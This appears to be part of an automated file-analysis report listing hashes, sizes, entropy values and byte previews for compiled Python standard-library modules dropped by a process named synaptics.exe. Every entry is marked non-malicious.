                                                                                                                                                                                                                SHA-256:AFC3492464DE11038D1C10CDA01F77BF696F0E8D40473D051FC45010F493817F
                                                                                                                                                                                                                SHA-512:526856107C45154A04D454B11892B18912933C6812F720987746DD78505A777983E3EAACF06420AD6E3B33ACAC536E5196B8ACBDCB8E82AE472CA3CA4AFB7D71
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):61461
                                                                                                                                                                                                                Entropy (8bit):5.306008432548493
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:1536:xiqqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:LamjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                                                MD5:99D8884987B866D87431D517027A609B
                                                                                                                                                                                                                SHA1:C51727F482B0F044EDC4740BAEAD4E20C7AEA9C8
                                                                                                                                                                                                                SHA-256:374333B90BED601D15D352B33D3CDCBF74273F776106BE6F493AD270B084EAF9
                                                                                                                                                                                                                SHA-512:B8CD30C1C0FFB7A6CADE29FEDEDC6E74DCC1D2C30BF2FD2AE8753DC2E45FF5170B08DD9363348C1D12D80F6E3DB65F301374F38D45F9847673A7914A8C737366
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....*C:\Users\user\Desktop\tmp\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c...................
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                Entropy (8bit):5.3733040805997465
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:24:PBMgKEVTSAvFwzVCI0L67avc0Kb4S0bJB6R/rju:PzVu8wzVmxcZt0bJB65G
                                                                                                                                                                                                                MD5:3D6EA14177B89E8EDFF4D2F4F5F36115
                                                                                                                                                                                                                SHA1:BBB8DEBFD3D139965CA1FDB27408F8A5AD9CE7E3
                                                                                                                                                                                                                SHA-256:C66D49B9536B01B8AA65962F3D00DC09BFDF85572889976B4198C1B3AD84FF0D
                                                                                                                                                                                                                SHA-512:96490787F80BEA047186B23C26758C64D831B4ED00A5175B1C3180EBD61453EA61F49D04B3A4FB12B78568727CBCA065F9D4BF3D2D49B6F82A308C253CAAA58E
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dd........................@...s4...d.Z.g.d...Z.g.d...Z.g.d...Z.e.e...j.Z.e.e...j.Z.d.S.).a....Keywords (from "Grammar/python.gram")..This file is automatically generated; please don't muck it up!..To update the symbols in this file, 'cd' to the top directory of.the python source tree and run:.. PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen Grammar/python.gram Grammar/Tokens Lib/keyword.py..Alternatively, you can run 'make regen-keyword'..)...iskeyword..issoftkeyword..kwlist..softkwlist)#..False..None..TrueZ.andZ.asZ.assertZ.asyncZ.awaitZ.breakZ.classZ.continueZ.defZ.delZ.elifZ.elseZ.exceptZ.finallyZ.forZ.fromZ.globalZ.ifZ.import..inZ.is..lambdaZ.nonlocalZ.notZ.orZ.passZ.raise..returnZ.tryZ.whileZ.withZ.yield)..._Z.case..matchN)...__doc__..__all__r....r......frozenset..__contains__r....r......r....r.....(C:\Users\user\Desktop\tmp\lib\keyword.py..<module>....s...........&....
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):4152
                                                                                                                                                                                                                Entropy (8bit):5.314234570644431
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:IZ1X2ppmx0pYUG0wzU182wl91Tc7mh5JFxy8:k4yN10wz5lTTc7mh51
                                                                                                                                                                                                                MD5:C7230AD354F021EC0231950E3DBB3017
                                                                                                                                                                                                                SHA1:947A78AF06238AB3503788736CA890CDE0DA19E6
                                                                                                                                                                                                                SHA-256:E7CFC15A17AFE4B69FDF8C1ED2BEF91D8C3439A97E27754575652424708364BA
                                                                                                                                                                                                                SHA-512:048E0698CA7D416186C873C7EC65366469574FCC3AA49335633069CB55FEB7D0BD59293D4AED0D97866C42752FF022E612072E570EDB329D50674BF39D0994B0
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.i.Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Cache lines from Python source files...This is intended to read lines from modules imported -- hence if a filename.is not found, it will look down the module search path for a file by.that name.......N)...getline..clearcache..checkcache..lazycachec....................C...s....t.......d.S.).z.Clear the cache entirely.N)...cache..clear..r....r.....*C:\Users\user\Desktop\tmp\lib\linecache.pyr........s......r....c....................C...s8...t.|.|...}.d.|.....k.r.t.|...k.r.n...d.S.|.|.d.....S.d.S.).z~Get a line for a Python source file from the cache.. Update the cache if it doesn't contain an entry for this file already........)...getlines..len)...filename..lineno..module_globals..linesr....r....r....r........s..............r....c....................C...sR...|.t.v.r.t.|...}.t.|...d.k.r.t.|...d...S.z.t.|.|...W.S...t.y(......t.....g
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):46175
                                                                                                                                                                                                                Entropy (8bit):6.061994305403148
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:U5YArctJ0pztzQUB04zzRYKJFSd6tm2Ya4L+P9cLjYp:c1YJGzbB04zVYAFU6BYa4aPuL8p
                                                                                                                                                                                                                MD5:040F19DFE0AC62CC9A8382B2D5F22993
                                                                                                                                                                                                                SHA1:388BC4030220A150B0B83E360CEDAB40CCA0D203
                                                                                                                                                                                                                SHA-256:94B67F8E6C1803A7537C6DB1947C3DFD32869B8828E646F8252FACFA62512D98
                                                                                                                                                                                                                SHA-512:A66F8839656D9D92515BA7958F11480401CD8591C387A9BA0F00E69EA0B03EDD33C9D11BA9E021F5ECB1E6A5631355BC7E0521381A5F1242A197FC31A2BFF684
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.8.......................@...sF"..d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.z.d.d.l.T.W.n%..e.yW......d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.d...Z...d.d.d...Z.Y.n.w.d.e...v.r_e.Z.d.e...v.rfe.Z.e.Z.i.Z.e.. e...d.d.....Z.d.d...Z!..d.d.d...Z"d.d...Z#e..$d...Z%..d.d d!..Z&..d.d"d#..Z'..d.d$d%..Z(..d.d&d'..Z)..d.d)d*..Z*d+d,..Z.d-d...Z+..d.d/d0..Z,e-f.d1d2..Z.d3d4..Z/d5d6..Z0e.Z1d7d8..Z2d9d:..Z3d;d<..Z4d=d>..Z5d?d@..Z6..d.dBdC..Z7e.f.dDdE..Z8..d.dFd...Z.e.f.dGdH..Z9z.d.dIl.m:Z:..W.n...e...y.......dJdK..Z:Y.n.w.z.e;..W.n...e<..y.........d.dLdM..Z=Y.n.w...d.dNdM..Z=i.dOdP..dQdP..dRdS..dTdU..dVdU..dWdX..dYdZ..d[d\..d]d^..d_d`..dadS..dbdc..ddde..dfdg..dhdS..didS..djdS..i.dkdl..dmdn..dodp..dqdr..dsdg..dtdu..dvdc..dwdx..dydz..d{de..d|d}..d~d...d.d...d.d...d.dU..d.d...d.d.....dXd.d.d.d.d.d.d\d^d`d.....Z>e?e>.@....D.].\.ZAZBeA.Cd.d...ZAe>.DeAeB......q.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):12110
                                                                                                                                                                                                                Entropy (8bit):5.374945416164768
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:5+KxmTkRLMC//oLaidHTWAztIvowudjKauXTsmNDGnA:3maCdHbKLXTsmpGnA
                                                                                                                                                                                                                MD5:FFA8001CD8E8395C0F1A2CB498BB6D65
                                                                                                                                                                                                                SHA1:8AE935F3F1A07F75C55379F71773F0E4C6C53A35
                                                                                                                                                                                                                SHA-256:3B37DE6B5C7542D358D6004A43B733A9AFDC25F8E6D5CCC43A5EA3B890C78331
                                                                                                                                                                                                                SHA-512:C67FFD3D28E5F6BA35B441B9E9EE1A24E39C298408E7CC425DED38FB01A13B96A3FF03923156A5D9C376276491C92C31F7ECF14141875D690B33D18A041124F5
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dA5.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.S.).aS...Interface to the liblzma compression library...This module provides a class for reading and writing compressed files,.classes for incremental (de)compression, and convenience functions for.one-shot (de)compression...These classes and functions support both the XZ and legacy LZMA.container formats, as well as raw compressed data streams..)$Z.CHECK_NONEZ.CHECK_CRC32Z.CHECK_CRC64Z.CHECK_SHA256Z.CHECK_ID_MAXZ.CHECK_UNKNOWN..FILTER_LZMA1Z.FILTER_LZMA2Z.FILTER_DELTAZ.FILTER_X86Z.FILTER_IA64Z.FILTER_ARMZ.FILTER_ARMTHUMBZ.FILTER_POWERPCZ.FILTER_SPARC..FORMAT_AUTO..FORMAT_XZZ.FORMAT_ALONE..FORMAT_RAWZ.MF_HC3Z.MF_HC4Z.MF_BT2Z.MF_BT3Z.MF_BT4Z.MODE_FASTZ.MODE_NORMALZ.PRESET_DEFAULTZ.PRESET_EXTREME..LZMACompressor..LZMADecompressor..LZMAFile..LZMAError..open..compress..decompressZ.is_c
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):17629
                                                                                                                                                                                                                Entropy (8bit):5.673561382830569
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:qZMcSuUoeg6rHVMN9yByEWG6D+nTF+jZjB77Hb930:qWzgWMEWp4+jZjJ930
                                                                                                                                                                                                                MD5:F3373B2AA9C669F6C249E59826DE3C3D
                                                                                                                                                                                                                SHA1:4450418BEB380F465F31288E103CFD173F428800
                                                                                                                                                                                                                SHA-256:753D9CFF2340F83941F9757CDA0F3E45BDFF98FC554B2C346C51B4A2D1FB90D3
                                                                                                                                                                                                                SHA-512:D05D07A807FA1E00040AD17E0B09F33D3A3A572ECD621BCFE98ED201AAB3B2FB407A1E6E4D7799EEA9633A9C4191BE2C6C7AE5715C82C8AD969D86E1B5EA3145
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.Z.......................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.z.d.d.l.m.Z...W.n...e.y%......d.Z.Y.n.w.z.d.d.l.Z.W.n...e.y7......d.Z.Y.n.w.g.d...Z.g.d...Z.d.a.d.a.G.d.d...d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.d...Z.e.....d.d...Z.e.d.k.r|e.....d.S.d.S.).a....Guess the MIME type of a file...This module defines two useful functions:..guess_type(url, strict=True) -- guess the MIME type and encoding of a URL...guess_extension(type, strict=True) -- guess the extension for a given MIME type...It also contains the following, for tuning the behavior:..Data:..knownfiles -- list of files to parse.inited -- flag set when init() has been called.suffix_map -- dictionary mapping suffixes to suffixes.encodings_map -- dictionary mapping suffixes to encodings.types_map -- dictionary mapping suffixes to types..Functions:..init([files]) -- parse a list of files, default knownfiles (on Windows, the. default values are taken from the registry).read_mime_types(
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):3943
                                                                                                                                                                                                                Entropy (8bit):5.469523281570689
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:96:I8lOqPqiKqqHW7Nd5pqKHQwmHv35U4yhWqgv0+USVqtnqqgqhy:I8zPq/qq27NVqKlee4dq8LvVqtnqqgqU
                                                                                                                                                                                                                MD5:4442013AEBF1FDC2E772F68059E24BAC
                                                                                                                                                                                                                SHA1:112B3B7C8A9F9D2236EF94D8D86F43A2D3DB4ED6
                                                                                                                                                                                                                SHA-256:D20641D41130A2CF996012343E0A225E3B1D5F11097C0D07E826EB1C6E17C2D1
                                                                                                                                                                                                                SHA-512:9FB991AB6A6AA9F7CEE891389F994799E33B5C1736C3D62E1895B715390955D3F95287ED5E3FC60A123B12B6B3C4722969ADD4A159AF6BCB979BD4070BEA2AC1
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s\...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.g.Z.G.d.d...d.e...Z.G.d.d...d...Z.e.d.k.r,e.e.......d.S.d.S.).z-An object-oriented interface to .netrc files......N..netrc..NetrcParseErrorc....................@...s"...e.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.S.).r....z5Exception raised on syntax errors in the .netrc file.Nc....................C...s"...|.|._.|.|._.|.|._.t...|.|.....d.S...N)...filename..lineno..msg..Exception..__init__)...selfr....r....r......r.....&C:\Users\user\Desktop\tmp\lib\netrc.pyr........s............z.NetrcParseError.__init__c....................C...s....d.|.j.|.j.|.j.f...S.).Nz.%s (%s, line %s)).r....r....r....).r....r....r....r......__str__....s......z.NetrcParseError.__str__).NN)...__name__..__module__..__qualname__..__doc__r....r....r....r....r....r....r........s............c....................@...s....e.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).r....Nc....................C...s....|.d.u.}.|.d.u.r.t.j...t.j...d...d...}.i.|._.i.|._.z"t
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):15313
                                                                                                                                                                                                                Entropy (8bit):5.430343498211111
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:384:z78r8V5t+X9xyFga+mDB8s+qHe65jZBCrF++umt:Era/WkFga+mDGs+hsZwrF++umt
                                                                                                                                                                                                                MD5:5161CEBE0364696EBC651FCC3EC438CF
                                                                                                                                                                                                                SHA1:4AE6261E408F67619A3DC3E40696D1CE304CC340
                                                                                                                                                                                                                SHA-256:CDDDFB179B25CD5FFFD9EB601BA0DBDCE3CE0D6BBA9D34D8AC290119A98A7C2C
                                                                                                                                                                                                                SHA-512:F0B45BADEF595AF7845F2C2E5B4A9E4356B7AC9E458395876B216E56D3E42BD218855FDB5ECFB500738116A024C2740255183B341FCC37BBD91C7199C45ACFE4
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-dov.......................@...s....d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.g.d...Z.d.d...Z.z.d.d.l.m.Z.m.Z.m.Z...d.d...Z.W.n...e.yK......d.d...Z.Y.n.w.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.j.e._.d.d...Z.d.d...Z.d d!..Z d"d#..Z!z.d.d$l"m#Z#..W.n...e.y.......d.Z#Y.n.w.d%d&..Z$d'd(..Z%d)d*..Z&d+d,..Z'd-d...Z(z.d.d/l"m)Z)..W.n...e.y.......e(Z*Y.n.w.d0d1..Z*z.d.d2l"m+Z+m,Z-..W.n...e.y.......e*Z.Y.n.w.d3d4..Z/d5d6..Z0d7d8..d9d:..Z.e1e.d;..o.e..2..d<..d=k.Z3dCd>d?..Z4d@dA..Z5z.d.dBl"m6Z7..W.d.S...e...y.......Y.d.S.w.)Dz.Common pathname manipulations, WindowsNT/95 version...Instead of importing this module directly, import os and refer to this.module as os.path...........\..;../z..;C:\binZ.nul.....N)...*)&..normcase..isabs..join..splitdrive..split..splitext..basename..dirnameZ.commonprefixZ.getsizeZ.getmtimeZ.getatimeZ.getctime..islink..exists..lexists..isdir..isfile..ismount..expanduser..expandvars..normpath..abspath..curdir..pardir..sep..p
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1757
                                                                                                                                                                                                                Entropy (8bit):5.515149918547583
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:Y5kKoXsYZMmrK2Ehp8ItqhhhUIuoLpP0I2GIikGmObMn:Yhov26OqhDaodpkwbMn
                                                                                                                                                                                                                MD5:7F1CCA501371520D1357C1D9A9518104
                                                                                                                                                                                                                SHA1:ED55DF490C7DD3C2D62997E11286DD912E9A5659
                                                                                                                                                                                                                SHA-256:A54B11192A3B7B48E7A1F2764A77287FB4841B79499891810B80464D57E69F4F
                                                                                                                                                                                                                SHA-512:0BB2AB65DDE8E1312997A7B9DB4D77EA00087B177106A0B00732AFA44DD9FC61980A379AEB44E8CC612503698284F3A7AE2AAD38FE2A30CFDA79372AC7D3E1A3
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.........................@...s....d.Z.d.d...Z.d.d...Z.d.S.).z.Convert a NT pathname to a file URL and vice versa...This module only exists to provide OS-specific code.for urllib.requests, thus do not use directly..c....................C...s....d.d.l.}.d.d.l.}.|...d.d...}.d.|.v.r.|.d.d.....d.k.r |.d.d.....}.|...d...}.|.j...d...|.....S.|...d...}.t.|...d.k.sB|.d...d...|.j.v.rJd.|...}.t.|.....|.d...d.......}.|.d.....d...}.|.d...}.|.D.].}.|.rm|.d...|.j...|.....}.q_|...d...r||...d...r||.d.7.}.|.S.).z{OS-specific conversion from a relative URL of the 'file' scheme. to a file system path; not recommended for general use......N..:..|.....z.////......./..\.....z.Bad URL: .....)...string..urllib.parse..replace..split..parse..unquote..join..len..ascii_letters..OSError..upper..endswith)...urlr......urllib..components..comp..error..drive..path..r.....+C:\Users\user\Desktop\tmp\lib\nturl2path.py..url2pathname....s*.............................................r....c....................C
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):13518
                                                                                                                                                                                                                Entropy (8bit):4.843645147232107
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:192:a25I4L+HDe0C1/u2/DqnsvQgZ2CsiIKoVkDq01iYL5ADAzi8Lq4UZfm:Z5weTs2rwejZ2CoKo4iY9cA+8LAfm
                                                                                                                                                                                                                MD5:110D7249FC4947BB113D6B8049C0361F
                                                                                                                                                                                                                SHA1:F0899AC9E4E96774E0FB232D68A021E6D1D3EF69
                                                                                                                                                                                                                SHA-256:970448F68D6325501C5143DFB91A6D24DDA5C292C6C5E3F29EDE9C5E1EF2B213
                                                                                                                                                                                                                SHA-512:DA12EEBEF3EF196637391A240A1446FE08E8FB1FC3E60D5ED81EE23260809D39A19072AC4C4690C8144ED494B33C9801ACF15566C8F697792ED972347C1D7DB2
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d.+.......................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.d"d#..Z.e.Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.d,d-..Z.d.d/..Z.d0d1..Z.d2d3..Z.d4d5..Z.d6d7..Z.d8d9..Z.d:d;..Z d<d=..Z!d>d?..Z"d@dA..Z#dBdC..Z$dDdE..Z%dFdG..Z&dHdI..Z'dqdJdK..Z(G.dLdM..dM..Z)G.dNdO..dO..Z*G.dPdQ..dQ..Z+dRdS..Z,dTdU..Z-dVdW..Z.dXdY..Z/dZd[..Z0d\d]..Z1d^d_..Z2d`da..Z3dbdc..Z4ddde..Z5dfdg..Z6dhdi..Z7djdk..Z8dldm..Z9z.d.dnl:T.W.n...e;y.......Y.n.w.d.dol:m.Z...e.Z<e.Z=e.Z>e.Z?e.Z@e.ZAe.ZBe.ZCe.ZDe.ZEe.ZFe.ZGe.ZHe.ZIe.ZJe.ZKe.ZLe.ZMe.ZNe.ZOe.ZPe.ZQe.ZRe.ZSe.ZTe ZUe!ZVe"ZWe$ZXe%ZYe'ZZe,Z[e-Z\e.Z]e/Z^e0Z_e1Z`e2Zae3Zbe4Zce5Zde6Zee7Zfe8Zge9ZhdpS.)ras....Operator Interface..This module exports a set of functions corresponding to the intrinsic.operators of Python. For example, operator.add(x, y) is equivalent.to the expression x+y. The function names are those used for special.methods; variants
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):31609
                                                                                                                                                                                                                Entropy (8bit):5.451319821940571
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:6Zz4Z1oaK+W0l85fOHqjQmZxhVQIuA5+LBL3L8LOULOLwvLdLtg4aE2aYiZ9:hbK+WHaKQmZBw2LN2Y
                                                                                                                                                                                                                MD5:52AC8B6D03833D14302EAACFB3C9EC6A
                                                                                                                                                                                                                SHA1:917DB1AF29FF43759C3EFE5258894609DAEE02ED
                                                                                                                                                                                                                SHA-256:C46828DAECB00F4A03FF5F4847DA158A9DB67FDFD59E34E13579ECB67064EB80
                                                                                                                                                                                                                SHA-512:2B2EB16C4035D71E4A28EAC3A074597CA4621D28D169E67E9AAD000CC9D22CDA109D98C0D7F4869F1AB2323FB63FDB5570C673600B102F86E66622A26626B45D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d........................@...sh...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...e.e.e.....Z.e.j.Z.g.d...Z.d.d...Z.d.d...Z.d.e.v.rod.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.yK......Y.n.w.d.d.l.Z.z.d.d.l.m.Z...W.n...e.ya......Y.n.w.d.d.l.Z.e...e.e.......[.nId.e.v.r.d.Z.d.Z.d.d.l.T.z.d.d.l.m.Z...e...d.....W.n...e.y.......Y.n.w.d.d.l.Z.d.d.l.Z.e...e.e.......[.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.d.....e.e.j.d.<.d.d.l.m.Z.m.Z.m Z m!Z!m"Z"m#Z#m$Z$m%Z%..[.e.d.....r.e&..Z'd.d...Z(e)..Z*e(d.d.....e(d.d.....e(d.d.....e(d.d.....e(d.d ....e(d!d"....e(d#d$....e(d%d&....e(d'd(....e(d)d*....e(d+d,....e(d-d.....e(d/d0....e(d1d2....e(d1d3....e(d4d ....e*Z+e)..Z*e(d.d.....e*Z,e)..Z*e(d5d6....e(d7d.....e(d8d.....e(d9d:....e(d9d;....e(d<d=....e*.-e.....e(d>d?....e(d@d ....e(dAd ....e(dBdC....e.dD....r.e.dE....r.e(dFdD....e*Z.e)..Z*e(d.d.....e(d.d.....e(d.d.....e(dGdH....e(dId.....e.dJ....r.e(dKd.....e(d!d"....e(dLd ....e(dMd.....e(d.d.....e(d4d ....e(dNd.....e*Z/[*[.['[(d.Z0dOZ1dPZ2d.dSdT..Z3
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):42062
                                                                                                                                                                                                                Entropy (8bit):5.2377775068417565
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:768:qJHqwOM28a8BgsMwiT3iWOhVECkoB3RDwgU46Jr8Dybx4YChUPbmHMx2+64qvWLo:EKwOM2QLMweUhVECkoB3REz4uPx2hUjY
                                                                                                                                                                                                                MD5:B01FCA7B805AF2A915EF63AA93C896EA
                                                                                                                                                                                                                SHA1:7453166A5B6EA27A355B90A887DD516B14FA96BB
                                                                                                                                                                                                                SHA-256:AA28992D552D75F43D7D53EDF2933084F70574A373D8FADD439764FA15BC335F
                                                                                                                                                                                                                SHA-512:9894DEE0BEA1A7EF185BA847C2F6CF718C6D77DA9B0704482A1CC38336A813C91DBD34DC45AB517F8716D47397A655D1C87D9877294F1CEDABFB10408D6A6619
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:o........{-d\........................@...s4...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z.d.Z.d.Z d.Z!e.e.e.e.f.Z"e.e e!f.Z#d.d...Z$d.d...Z%G.d.d...d.e&..Z'G.d.d...d.e'..Z(G.d.d...d.e'..Z)e(..Z*e)..Z+G.d.d...d...Z,G.d.d...d.e,..Z-e-..Z.d.d...Z/e0e.d...r.e..1..e/..Z/G.d.d...d...Z2G.d.d...d...Z3G.d d!..d!e2..Z4G.d"d#..d#e2..Z5G.d$d%..d%e2..Z6G.d&d'..d'e...Z7G.d(d)..d)e&..Z8e.j9.:e8....G.d*d+..d+e8..Z;G.d,d-..d-e8..Z<G.d.d/..d/e8..Z=G.d0d1..d1e=e;..Z>G.d2d3..d3e=e<..Z?d.S.)4.....N)...Sequence)...EINVAL..ENOENT..ENOTDIR..EBADF..ELOOP)...attrgetter)...S_ISDIR..S_ISLNK..S_ISREG..S_ISSOCK..S_ISBLK..S_ISCHR..S_ISFIFO)...quote_from_bytes)...PurePath..PurePosixPath..PureWindowsPath..Path..PosixPath..WindowsPath......{...i....c....................C...s ...t.|.d.d...t.v.p.t.|.d.d...t.v.S.).N..errno..winerror)...getattr.._IGNORED_ERROS.._IGNORED_WINERRORS)...except
                                                                                                                                                                                                                Process:C:\Users\user\Desktop\tmp\synaptics.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):10540
                                                                                                                                                                                                                Entropy (8bit):5.325288035457031
                                                                                                                                                                                                                Encrypted:false
